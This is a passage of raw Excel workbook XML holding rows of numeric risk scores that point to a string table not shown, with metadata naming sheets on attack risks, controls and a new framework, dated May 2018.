      <c r="B173" s="1" t="s">
        <v>305</v>
      </c>
      <c r="C173" s="1" t="s">
        <v>310</v>
      </c>
      <c r="D173" s="11">
        <v>2</v>
      </c>
      <c r="E173" s="3" t="s">
        <v>462</v>
      </c>
      <c r="F173" s="11">
        <v>0</v>
      </c>
      <c r="G173" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H173" s="11">
        <v>0</v>
      </c>
      <c r="I173" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="174" spans="1:9" ht="135" x14ac:dyDescent="0.2">
      <c r="A174" s="1" t="s">
        <v>311</v>
      </c>
      <c r="B174" s="1" t="s">
        <v>305</v>
      </c>
      <c r="C174" s="1" t="s">
        <v>312</v>
      </c>
      <c r="D174" s="11">
        <v>0</v>
      </c>
      <c r="E174" s="3" t="s">
        <v>463</v>
      </c>
      <c r="F174" s="11">
        <v>0</v>
      </c>
      <c r="G174" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H174" s="11">
        <v>0</v>
      </c>
      <c r="I174" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="175" spans="1:9" ht="165" x14ac:dyDescent="0.2">
      <c r="A175" s="1" t="s">
        <v>313</v>
      </c>
      <c r="B175" s="1" t="s">
        <v>305</v>
      </c>
      <c r="C175" s="1" t="s">
        <v>314</v>
      </c>
      <c r="D175" s="11">
        <v>0</v>
      </c>
      <c r="E175" s="3" t="s">
        <v>464</v>
      </c>
      <c r="F175" s="11">
        <v>0</v>
      </c>
      <c r="G175" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H175" s="11">
        <v>0</v>
      </c>
      <c r="I175" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="176" spans="1:9" ht="150" x14ac:dyDescent="0.2">
      <c r="A176" s="1" t="s">
        <v>315</v>
      </c>
      <c r="B176" s="1" t="s">
        <v>305</v>
      </c>
      <c r="C176" s="1" t="s">
        <v>316</v>
      </c>
      <c r="D176" s="11">
        <v>0</v>
      </c>
      <c r="E176" s="3" t="s">
        <v>489</v>
      </c>
      <c r="F176" s="11">
        <v>0</v>
      </c>
      <c r="G176" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H176" s="11">
        <v>0</v>
      </c>
      <c r="I176" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="177" spans="1:9" ht="409.6" x14ac:dyDescent="0.2">
      <c r="A177" s="1" t="s">
        <v>317</v>
      </c>
      <c r="B177" s="1" t="s">
        <v>305</v>
      </c>
      <c r="C177" s="1" t="s">
        <v>318</v>
      </c>
      <c r="D177" s="11">
        <v>2</v>
      </c>
      <c r="E177" s="3" t="s">
        <v>459</v>
      </c>
      <c r="F177" s="11">
        <v>4</v>
      </c>
      <c r="G177" s="3" t="s">
        <v>439</v>
      </c>
      <c r="H177" s="11">
        <v>0</v>
      </c>
      <c r="I177" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="178" spans="1:9" ht="315" x14ac:dyDescent="0.2">
      <c r="A178" s="1" t="s">
        <v>319</v>
      </c>
      <c r="B178" s="1" t="s">
        <v>305</v>
      </c>
      <c r="C178" s="1" t="s">
        <v>320</v>
      </c>
      <c r="D178" s="11">
        <v>2</v>
      </c>
      <c r="E178" s="3" t="s">
        <v>513</v>
      </c>
      <c r="F178" s="11">
        <v>3</v>
      </c>
      <c r="G178" s="3" t="s">
        <v>514</v>
      </c>
      <c r="H178" s="11">
        <v>1</v>
      </c>
      <c r="I178" s="3" t="s">
        <v>423</v>
      </c>
    </row>
    <row r="179" spans="1:9" ht="210" x14ac:dyDescent="0.2">
      <c r="A179" s="1" t="s">
        <v>321</v>
      </c>
      <c r="B179" s="1" t="s">
        <v>305</v>
      </c>
      <c r="C179" s="1" t="s">
        <v>322</v>
      </c>
      <c r="D179" s="11">
        <v>4</v>
      </c>
      <c r="E179" s="3" t="s">
        <v>515</v>
      </c>
      <c r="F179" s="11">
        <v>0</v>
      </c>
      <c r="G179" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H179" s="11">
        <v>0</v>
      </c>
      <c r="I179" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="180" spans="1:9" ht="225" x14ac:dyDescent="0.2">
      <c r="A180" s="1" t="s">
        <v>323</v>
      </c>
      <c r="B180" s="1" t="s">
        <v>305</v>
      </c>
      <c r="C180" s="1" t="s">
        <v>324</v>
      </c>
      <c r="D180" s="11">
        <v>2</v>
      </c>
      <c r="E180" s="3" t="s">
        <v>518</v>
      </c>
      <c r="F180" s="11">
        <v>0</v>
      </c>
      <c r="G180" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H180" s="11">
        <v>0</v>
      </c>
      <c r="I180" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="181" spans="1:9" ht="255" x14ac:dyDescent="0.2">
      <c r="A181" s="1" t="s">
        <v>325</v>
      </c>
      <c r="B181" s="1" t="s">
        <v>305</v>
      </c>
      <c r="C181" s="1" t="s">
        <v>326</v>
      </c>
      <c r="D181" s="11">
        <v>2</v>
      </c>
      <c r="E181" s="3" t="s">
        <v>519</v>
      </c>
      <c r="F181" s="11">
        <v>0</v>
      </c>
      <c r="G181" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H181" s="11">
        <v>0</v>
      </c>
      <c r="I181" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="182" spans="1:9" ht="165" x14ac:dyDescent="0.2">
      <c r="A182" s="1" t="s">
        <v>327</v>
      </c>
      <c r="B182" s="1" t="s">
        <v>305</v>
      </c>
      <c r="C182" s="1" t="s">
        <v>328</v>
      </c>
      <c r="D182" s="11">
        <v>2</v>
      </c>
      <c r="E182" s="3" t="s">
        <v>459</v>
      </c>
      <c r="F182" s="11">
        <v>0</v>
      </c>
      <c r="G182" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H182" s="11">
        <v>0</v>
      </c>
      <c r="I182" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="183" spans="1:9" ht="255" x14ac:dyDescent="0.2">
      <c r="A183" s="1" t="s">
        <v>329</v>
      </c>
      <c r="B183" s="1" t="s">
        <v>305</v>
      </c>
      <c r="C183" s="1" t="s">
        <v>330</v>
      </c>
      <c r="D183" s="11">
        <v>2</v>
      </c>
      <c r="E183" s="3" t="s">
        <v>524</v>
      </c>
      <c r="F183" s="11">
        <v>0</v>
      </c>
      <c r="G183" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H183" s="11">
        <v>0</v>
      </c>
      <c r="I183" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="184" spans="1:9" ht="360" x14ac:dyDescent="0.2">
      <c r="A184" s="1" t="s">
        <v>331</v>
      </c>
      <c r="B184" s="1" t="s">
        <v>305</v>
      </c>
      <c r="C184" s="1" t="s">
        <v>332</v>
      </c>
      <c r="D184" s="11">
        <v>0</v>
      </c>
      <c r="E184" s="3" t="s">
        <v>484</v>
      </c>
      <c r="F184" s="11">
        <v>2</v>
      </c>
      <c r="G184" s="3" t="s">
        <v>549</v>
      </c>
      <c r="H184" s="11">
        <v>0</v>
      </c>
      <c r="I184" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="185" spans="1:9" ht="195" x14ac:dyDescent="0.2">
      <c r="A185" s="1" t="s">
        <v>333</v>
      </c>
      <c r="B185" s="1" t="s">
        <v>6</v>
      </c>
      <c r="C185" s="1" t="s">
        <v>335</v>
      </c>
      <c r="D185" s="11">
        <v>3</v>
      </c>
      <c r="E185" s="3" t="s">
        <v>435</v>
      </c>
      <c r="F185" s="11">
        <v>0</v>
      </c>
      <c r="G185" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H185" s="11">
        <v>0</v>
      </c>
      <c r="I185" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="186" spans="1:9" ht="315" x14ac:dyDescent="0.2">
      <c r="A186" s="1" t="s">
        <v>336</v>
      </c>
      <c r="B186" s="1" t="s">
        <v>6</v>
      </c>
      <c r="C186" s="1" t="s">
        <v>337</v>
      </c>
      <c r="D186" s="11">
        <v>1</v>
      </c>
      <c r="E186" s="3" t="s">
        <v>479</v>
      </c>
      <c r="F186" s="11">
        <v>0</v>
      </c>
      <c r="G186" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H186" s="11">
        <v>0</v>
      </c>
      <c r="I186" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="187" spans="1:9" ht="330" x14ac:dyDescent="0.2">
      <c r="A187" s="1" t="s">
        <v>338</v>
      </c>
      <c r="B187" s="1" t="s">
        <v>6</v>
      </c>
      <c r="C187" s="1" t="s">
        <v>339</v>
      </c>
      <c r="D187" s="11">
        <v>2</v>
      </c>
      <c r="E187" s="3" t="s">
        <v>490</v>
      </c>
      <c r="F187" s="11">
        <v>0</v>
      </c>
      <c r="H187" s="11">
        <v>3</v>
      </c>
      <c r="I187" s="3" t="s">
        <v>491</v>
      </c>
    </row>
    <row r="188" spans="1:9" ht="180" x14ac:dyDescent="0.2">
      <c r="A188" s="1" t="s">
        <v>154</v>
      </c>
      <c r="B188" s="1" t="s">
        <v>6</v>
      </c>
      <c r="C188" s="1" t="s">
        <v>340</v>
      </c>
      <c r="D188" s="11">
        <v>3</v>
      </c>
      <c r="E188" s="3" t="s">
        <v>486</v>
      </c>
      <c r="F188" s="11">
        <v>0</v>
      </c>
      <c r="G188" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H188" s="11">
        <v>2</v>
      </c>
      <c r="I188" s="3" t="s">
        <v>423</v>
      </c>
    </row>
    <row r="189" spans="1:9" ht="165" x14ac:dyDescent="0.2">
      <c r="A189" s="1" t="s">
        <v>341</v>
      </c>
      <c r="B189" s="1" t="s">
        <v>6</v>
      </c>
      <c r="C189" s="1" t="s">
        <v>342</v>
      </c>
      <c r="D189" s="11">
        <v>2</v>
      </c>
      <c r="E189" s="3" t="s">
        <v>525</v>
      </c>
      <c r="F189" s="11">
        <v>0</v>
      </c>
      <c r="G189" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H189" s="11">
        <v>0</v>
      </c>
      <c r="I189" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="190" spans="1:9" ht="300" x14ac:dyDescent="0.2">
      <c r="A190" s="1" t="s">
        <v>343</v>
      </c>
      <c r="B190" s="1" t="s">
        <v>6</v>
      </c>
      <c r="C190" s="1" t="s">
        <v>344</v>
      </c>
      <c r="D190" s="11">
        <v>2</v>
      </c>
      <c r="E190" s="3" t="s">
        <v>525</v>
      </c>
      <c r="F190" s="11">
        <v>0</v>
      </c>
      <c r="G190" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H190" s="11">
        <v>0</v>
      </c>
      <c r="I190" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="191" spans="1:9" ht="360" x14ac:dyDescent="0.2">
      <c r="A191" s="1" t="s">
        <v>345</v>
      </c>
      <c r="B191" s="1" t="s">
        <v>6</v>
      </c>
      <c r="C191" s="1" t="s">
        <v>346</v>
      </c>
      <c r="D191" s="11">
        <v>2</v>
      </c>
      <c r="E191" s="3" t="s">
        <v>459</v>
      </c>
      <c r="F191" s="11">
        <v>0</v>
      </c>
      <c r="G191" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H191" s="11">
        <v>0</v>
      </c>
      <c r="I191" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="192" spans="1:9" ht="45" x14ac:dyDescent="0.2">
      <c r="A192" s="1" t="s">
        <v>347</v>
      </c>
      <c r="B192" s="1" t="s">
        <v>6</v>
      </c>
      <c r="C192" s="1" t="s">
        <v>348</v>
      </c>
      <c r="D192" s="11">
        <v>1</v>
      </c>
      <c r="E192" s="3" t="s">
        <v>530</v>
      </c>
      <c r="F192" s="11">
        <v>4</v>
      </c>
      <c r="G192" s="3" t="s">
        <v>439</v>
      </c>
      <c r="H192" s="11">
        <v>2</v>
      </c>
      <c r="I192" s="3" t="s">
        <v>423</v>
      </c>
    </row>
    <row r="193" spans="1:9" ht="255" x14ac:dyDescent="0.2">
      <c r="A193" s="1" t="s">
        <v>349</v>
      </c>
      <c r="B193" s="1" t="s">
        <v>6</v>
      </c>
      <c r="C193" s="1" t="s">
        <v>350</v>
      </c>
      <c r="D193" s="11">
        <v>2</v>
      </c>
      <c r="E193" s="3" t="s">
        <v>521</v>
      </c>
      <c r="F193" s="11">
        <v>0</v>
      </c>
      <c r="G193" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H193" s="11">
        <v>0</v>
      </c>
      <c r="I193" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="194" spans="1:9" ht="270" x14ac:dyDescent="0.2">
      <c r="A194" s="1" t="s">
        <v>104</v>
      </c>
      <c r="B194" s="1" t="s">
        <v>6</v>
      </c>
      <c r="C194" s="1" t="s">
        <v>105</v>
      </c>
      <c r="D194" s="11">
        <v>3</v>
      </c>
      <c r="E194" s="3" t="s">
        <v>547</v>
      </c>
      <c r="F194" s="11">
        <v>0</v>
      </c>
      <c r="G194" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H194" s="11">
        <v>0</v>
      </c>
      <c r="I194" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="195" spans="1:9" ht="255" x14ac:dyDescent="0.2">
      <c r="A195" s="1" t="s">
        <v>351</v>
      </c>
      <c r="B195" s="1" t="s">
        <v>6</v>
      </c>
      <c r="C195" s="1" t="s">
        <v>352</v>
      </c>
      <c r="D195" s="11">
        <v>2</v>
      </c>
      <c r="E195" s="3" t="s">
        <v>562</v>
      </c>
      <c r="F195" s="11">
        <v>0</v>
      </c>
      <c r="G195" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H195" s="11">
        <v>2</v>
      </c>
      <c r="I195" s="3" t="s">
        <v>556</v>
      </c>
    </row>
    <row r="196" spans="1:9" ht="75" x14ac:dyDescent="0.2">
      <c r="A196" s="1" t="s">
        <v>114</v>
      </c>
      <c r="B196" s="1" t="s">
        <v>6</v>
      </c>
      <c r="C196" s="1" t="s">
        <v>115</v>
      </c>
      <c r="D196" s="11">
        <v>2</v>
      </c>
      <c r="E196" s="3" t="s">
        <v>563</v>
      </c>
      <c r="F196" s="11">
        <v>0</v>
      </c>
      <c r="G196" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H196" s="11">
        <v>2</v>
      </c>
      <c r="I196" s="3" t="s">
        <v>556</v>
      </c>
    </row>
    <row r="197" spans="1:9" ht="120" x14ac:dyDescent="0.2">
      <c r="A197" s="1" t="s">
        <v>353</v>
      </c>
      <c r="B197" s="1" t="s">
        <v>15</v>
      </c>
      <c r="C197" s="1" t="s">
        <v>355</v>
      </c>
      <c r="D197" s="11">
        <v>0</v>
      </c>
      <c r="E197" s="1" t="s">
        <v>422</v>
      </c>
      <c r="F197" s="11">
        <v>0</v>
      </c>
      <c r="G197" s="3" t="s">
        <v>420</v>
      </c>
      <c r="H197" s="11">
        <v>2</v>
      </c>
      <c r="I197" s="3" t="s">
        <v>423</v>
      </c>
    </row>
    <row r="198" spans="1:9" ht="135" x14ac:dyDescent="0.2">
      <c r="A198" s="1" t="s">
        <v>356</v>
      </c>
      <c r="B198" s="1" t="s">
        <v>15</v>
      </c>
      <c r="C198" s="1" t="s">
        <v>357</v>
      </c>
      <c r="D198" s="11">
        <v>2</v>
      </c>
      <c r="E198" s="3" t="s">
        <v>565</v>
      </c>
      <c r="F198" s="11">
        <v>1</v>
      </c>
      <c r="G198" s="3" t="s">
        <v>576</v>
      </c>
      <c r="H198" s="11">
        <v>2</v>
      </c>
      <c r="I198" s="3" t="s">
        <v>575</v>
      </c>
    </row>
    <row r="199" spans="1:9" ht="30" x14ac:dyDescent="0.2">
      <c r="A199" s="1" t="s">
        <v>358</v>
      </c>
      <c r="B199" s="1" t="s">
        <v>15</v>
      </c>
      <c r="C199" s="1" t="s">
        <v>359</v>
      </c>
      <c r="D199" s="11">
        <v>0</v>
      </c>
      <c r="E199" s="3" t="s">
        <v>450</v>
      </c>
      <c r="F199" s="11">
        <v>0</v>
      </c>
      <c r="G199" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H199" s="11">
        <v>2</v>
      </c>
      <c r="I199" s="3" t="s">
        <v>423</v>
      </c>
    </row>
    <row r="200" spans="1:9" ht="90" x14ac:dyDescent="0.2">
      <c r="A200" s="1" t="s">
        <v>360</v>
      </c>
      <c r="B200" s="1" t="s">
        <v>15</v>
      </c>
      <c r="C200" s="1" t="s">
        <v>361</v>
      </c>
      <c r="D200" s="11">
        <v>3</v>
      </c>
      <c r="E200" s="3" t="s">
        <v>468</v>
      </c>
      <c r="F200" s="11">
        <v>1</v>
      </c>
      <c r="G200" s="3" t="s">
        <v>469</v>
      </c>
      <c r="H200" s="11">
        <v>4</v>
      </c>
      <c r="I200" s="3" t="s">
        <v>470</v>
      </c>
    </row>
    <row r="201" spans="1:9" ht="409.6" x14ac:dyDescent="0.2">
      <c r="A201" s="1" t="s">
        <v>362</v>
      </c>
      <c r="B201" s="1" t="s">
        <v>15</v>
      </c>
      <c r="C201" s="1" t="s">
        <v>363</v>
      </c>
      <c r="D201" s="11">
        <v>0</v>
      </c>
      <c r="E201" s="3" t="s">
        <v>471</v>
      </c>
      <c r="F201" s="11">
        <v>0</v>
      </c>
      <c r="G201" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H201" s="11">
        <v>0</v>
      </c>
      <c r="I201" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="202" spans="1:9" ht="135" x14ac:dyDescent="0.2">
      <c r="A202" s="1" t="s">
        <v>364</v>
      </c>
      <c r="B202" s="1" t="s">
        <v>15</v>
      </c>
      <c r="C202" s="1" t="s">
        <v>365</v>
      </c>
      <c r="D202" s="11">
        <v>1</v>
      </c>
      <c r="E202" s="3" t="s">
        <v>472</v>
      </c>
      <c r="F202" s="11">
        <v>1</v>
      </c>
      <c r="G202" s="3" t="s">
        <v>469</v>
      </c>
      <c r="H202" s="11">
        <v>3</v>
      </c>
      <c r="I202" s="3" t="s">
        <v>470</v>
      </c>
    </row>
    <row r="203" spans="1:9" ht="120" x14ac:dyDescent="0.2">
      <c r="A203" s="1" t="s">
        <v>366</v>
      </c>
      <c r="B203" s="1" t="s">
        <v>15</v>
      </c>
      <c r="C203" s="1" t="s">
        <v>367</v>
      </c>
      <c r="D203" s="11">
        <v>2</v>
      </c>
      <c r="E203" s="3" t="s">
        <v>459</v>
      </c>
      <c r="F203" s="11">
        <v>1</v>
      </c>
      <c r="G203" s="3" t="s">
        <v>469</v>
      </c>
      <c r="H203" s="11">
        <v>3</v>
      </c>
      <c r="I203" s="3" t="s">
        <v>470</v>
      </c>
    </row>
    <row r="204" spans="1:9" ht="135" x14ac:dyDescent="0.2">
      <c r="A204" s="1" t="s">
        <v>368</v>
      </c>
      <c r="B204" s="1" t="s">
        <v>15</v>
      </c>
      <c r="C204" s="1" t="s">
        <v>369</v>
      </c>
      <c r="D204" s="11">
        <v>4</v>
      </c>
      <c r="E204" s="3" t="s">
        <v>474</v>
      </c>
      <c r="F204" s="11">
        <v>1</v>
      </c>
      <c r="G204" s="3" t="s">
        <v>469</v>
      </c>
      <c r="H204" s="11">
        <v>3</v>
      </c>
      <c r="I204" s="3" t="s">
        <v>470</v>
      </c>
    </row>
    <row r="205" spans="1:9" ht="165" x14ac:dyDescent="0.2">
      <c r="A205" s="1" t="s">
        <v>370</v>
      </c>
      <c r="B205" s="1" t="s">
        <v>15</v>
      </c>
      <c r="C205" s="1" t="s">
        <v>371</v>
      </c>
      <c r="D205" s="11">
        <v>1</v>
      </c>
      <c r="E205" s="3" t="s">
        <v>452</v>
      </c>
      <c r="F205" s="11">
        <v>2</v>
      </c>
      <c r="G205" s="3" t="s">
        <v>577</v>
      </c>
      <c r="H205" s="11">
        <v>2</v>
      </c>
      <c r="I205" s="3" t="s">
        <v>423</v>
      </c>
    </row>
    <row r="206" spans="1:9" ht="315" x14ac:dyDescent="0.2">
      <c r="A206" s="1" t="s">
        <v>319</v>
      </c>
      <c r="B206" s="1" t="s">
        <v>15</v>
      </c>
      <c r="C206" s="1" t="s">
        <v>320</v>
      </c>
      <c r="D206" s="11">
        <v>2</v>
      </c>
      <c r="E206" s="3" t="s">
        <v>513</v>
      </c>
      <c r="F206" s="11">
        <v>3</v>
      </c>
      <c r="G206" s="3" t="s">
        <v>514</v>
      </c>
      <c r="H206" s="11">
        <v>1</v>
      </c>
      <c r="I206" s="3" t="s">
        <v>423</v>
      </c>
    </row>
    <row r="207" spans="1:9" ht="345" x14ac:dyDescent="0.2">
      <c r="A207" s="1" t="s">
        <v>372</v>
      </c>
      <c r="B207" s="1" t="s">
        <v>15</v>
      </c>
      <c r="C207" s="1" t="s">
        <v>373</v>
      </c>
      <c r="D207" s="11">
        <v>0</v>
      </c>
      <c r="E207" s="3" t="s">
        <v>484</v>
      </c>
      <c r="F207" s="11">
        <v>4</v>
      </c>
      <c r="G207" s="3" t="s">
        <v>439</v>
      </c>
      <c r="H207" s="11">
        <v>3</v>
      </c>
      <c r="I207" s="3" t="s">
        <v>442</v>
      </c>
    </row>
    <row r="208" spans="1:9" ht="60" x14ac:dyDescent="0.2">
      <c r="A208" s="1" t="s">
        <v>374</v>
      </c>
      <c r="B208" s="1" t="s">
        <v>15</v>
      </c>
      <c r="C208" s="1" t="s">
        <v>375</v>
      </c>
      <c r="D208" s="11">
        <v>0</v>
      </c>
      <c r="E208" s="3" t="s">
        <v>533</v>
      </c>
      <c r="F208" s="11">
        <v>0</v>
      </c>
      <c r="G208" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H208" s="11">
        <v>2</v>
      </c>
      <c r="I208" s="3" t="s">
        <v>423</v>
      </c>
    </row>
    <row r="209" spans="1:9" ht="180" x14ac:dyDescent="0.2">
      <c r="A209" s="1" t="s">
        <v>376</v>
      </c>
      <c r="B209" s="1" t="s">
        <v>15</v>
      </c>
      <c r="C209" s="1" t="s">
        <v>377</v>
      </c>
      <c r="D209" s="11">
        <v>4</v>
      </c>
      <c r="E209" s="3" t="s">
        <v>553</v>
      </c>
      <c r="F209" s="11">
        <v>0</v>
      </c>
      <c r="G209" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H209" s="11">
        <v>2</v>
      </c>
      <c r="I209" s="3" t="s">
        <v>554</v>
      </c>
    </row>
    <row r="210" spans="1:9" ht="105" x14ac:dyDescent="0.2">
      <c r="A210" s="1" t="s">
        <v>378</v>
      </c>
      <c r="B210" s="1" t="s">
        <v>380</v>
      </c>
      <c r="C210" s="1" t="s">
        <v>381</v>
      </c>
      <c r="D210" s="11">
        <v>2</v>
      </c>
      <c r="E210" s="3" t="s">
        <v>438</v>
      </c>
      <c r="F210" s="11">
        <v>4</v>
      </c>
      <c r="G210" s="3" t="s">
        <v>439</v>
      </c>
      <c r="H210" s="11">
        <v>4</v>
      </c>
      <c r="I210" s="3" t="s">
        <v>440</v>
      </c>
    </row>
    <row r="211" spans="1:9" ht="90" x14ac:dyDescent="0.2">
      <c r="A211" s="1" t="s">
        <v>382</v>
      </c>
      <c r="B211" s="1" t="s">
        <v>380</v>
      </c>
      <c r="C211" s="1" t="s">
        <v>383</v>
      </c>
      <c r="D211" s="11">
        <v>4</v>
      </c>
      <c r="E211" s="3" t="s">
        <v>475</v>
      </c>
      <c r="F211" s="11">
        <v>1</v>
      </c>
      <c r="G211" s="3" t="s">
        <v>469</v>
      </c>
      <c r="H211" s="11">
        <v>3</v>
      </c>
      <c r="I211" s="3" t="s">
        <v>470</v>
      </c>
    </row>
    <row r="212" spans="1:9" ht="165" x14ac:dyDescent="0.2">
      <c r="A212" s="1" t="s">
        <v>384</v>
      </c>
      <c r="B212" s="1" t="s">
        <v>380</v>
      </c>
      <c r="C212" s="1" t="s">
        <v>385</v>
      </c>
      <c r="D212" s="11">
        <v>4</v>
      </c>
      <c r="E212" s="3" t="s">
        <v>475</v>
      </c>
      <c r="F212" s="11">
        <v>1</v>
      </c>
      <c r="G212" s="3" t="s">
        <v>469</v>
      </c>
      <c r="H212" s="11">
        <v>3</v>
      </c>
      <c r="I212" s="3" t="s">
        <v>470</v>
      </c>
    </row>
    <row r="213" spans="1:9" ht="45" x14ac:dyDescent="0.2">
      <c r="A213" s="1" t="s">
        <v>386</v>
      </c>
      <c r="B213" s="1" t="s">
        <v>380</v>
      </c>
      <c r="C213" s="1" t="s">
        <v>387</v>
      </c>
      <c r="D213" s="11">
        <v>2</v>
      </c>
      <c r="E213" s="3" t="s">
        <v>473</v>
      </c>
      <c r="F213" s="11">
        <v>1</v>
      </c>
      <c r="G213" s="3" t="s">
        <v>469</v>
      </c>
      <c r="H213" s="11">
        <v>3</v>
      </c>
      <c r="I213" s="3" t="s">
        <v>470</v>
      </c>
    </row>
    <row r="214" spans="1:9" ht="90" x14ac:dyDescent="0.2">
      <c r="A214" s="1" t="s">
        <v>388</v>
      </c>
      <c r="B214" s="1" t="s">
        <v>380</v>
      </c>
      <c r="C214" s="1" t="s">
        <v>389</v>
      </c>
      <c r="D214" s="11">
        <v>2</v>
      </c>
      <c r="E214" s="3" t="s">
        <v>459</v>
      </c>
      <c r="F214" s="11">
        <v>4</v>
      </c>
      <c r="G214" s="3" t="s">
        <v>439</v>
      </c>
      <c r="H214" s="11">
        <v>3</v>
      </c>
      <c r="I214" s="3" t="s">
        <v>440</v>
      </c>
    </row>
    <row r="215" spans="1:9" ht="45" x14ac:dyDescent="0.2">
      <c r="A215" s="1" t="s">
        <v>390</v>
      </c>
      <c r="B215" s="1" t="s">
        <v>380</v>
      </c>
      <c r="C215" s="1" t="s">
        <v>391</v>
      </c>
      <c r="D215" s="11">
        <v>2</v>
      </c>
      <c r="E215" s="3" t="s">
        <v>485</v>
      </c>
      <c r="F215" s="11">
        <v>4</v>
      </c>
      <c r="G215" s="3" t="s">
        <v>439</v>
      </c>
      <c r="H215" s="11">
        <v>3</v>
      </c>
      <c r="I215" s="3" t="s">
        <v>440</v>
      </c>
    </row>
    <row r="216" spans="1:9" ht="120" x14ac:dyDescent="0.2">
      <c r="A216" s="1" t="s">
        <v>392</v>
      </c>
      <c r="B216" s="1" t="s">
        <v>380</v>
      </c>
      <c r="C216" s="1" t="s">
        <v>393</v>
      </c>
      <c r="D216" s="11">
        <v>3</v>
      </c>
      <c r="E216" s="3" t="s">
        <v>486</v>
      </c>
      <c r="F216" s="11">
        <v>4</v>
      </c>
      <c r="G216" s="3" t="s">
        <v>439</v>
      </c>
      <c r="H216" s="11">
        <v>3</v>
      </c>
      <c r="I216" s="3" t="s">
        <v>440</v>
      </c>
    </row>
    <row r="217" spans="1:9" ht="90" x14ac:dyDescent="0.2">
      <c r="A217" s="1" t="s">
        <v>394</v>
      </c>
      <c r="B217" s="1" t="s">
        <v>380</v>
      </c>
      <c r="C217" s="1" t="s">
        <v>395</v>
      </c>
      <c r="D217" s="11">
        <v>3</v>
      </c>
      <c r="E217" s="3" t="s">
        <v>487</v>
      </c>
      <c r="F217" s="11">
        <v>4</v>
      </c>
      <c r="G217" s="3" t="s">
        <v>488</v>
      </c>
      <c r="H217" s="11">
        <v>3</v>
      </c>
      <c r="I217" s="3" t="s">
        <v>440</v>
      </c>
    </row>
    <row r="218" spans="1:9" ht="120" x14ac:dyDescent="0.2">
      <c r="A218" s="1" t="s">
        <v>396</v>
      </c>
      <c r="B218" s="1" t="s">
        <v>380</v>
      </c>
      <c r="C218" s="1" t="s">
        <v>397</v>
      </c>
      <c r="D218" s="11">
        <v>3</v>
      </c>
      <c r="E218" s="3" t="s">
        <v>534</v>
      </c>
      <c r="F218" s="11">
        <v>4</v>
      </c>
      <c r="G218" s="3" t="s">
        <v>439</v>
      </c>
      <c r="H218" s="11">
        <v>4</v>
      </c>
      <c r="I218" s="3" t="s">
        <v>440</v>
      </c>
    </row>
  </sheetData>
  <autoFilter ref="A1:I218" xr:uid="{292B6A43-8418-B84C-B474-BFA81B206214}"/>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
  <pageSetup paperSize="8" scale="34"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Werkbladen</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>7</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="7" baseType="lpstr">
      <vt:lpstr>Average risks LM</vt:lpstr>
      <vt:lpstr>Average risks Attack</vt:lpstr>
      <vt:lpstr>Distribution of controls </vt:lpstr>
      <vt:lpstr>Main values</vt:lpstr>
      <vt:lpstr>Translation</vt:lpstr>
      <vt:lpstr>Averages risks New Framework</vt:lpstr>
      <vt:lpstr>NewFramework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cp:lastPrinted>2018-05-22T10:44:51Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-05-15T17:58:24Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-05-28T20:43:05Z</dcterms:modified>
</cp:coreProperties>
</file>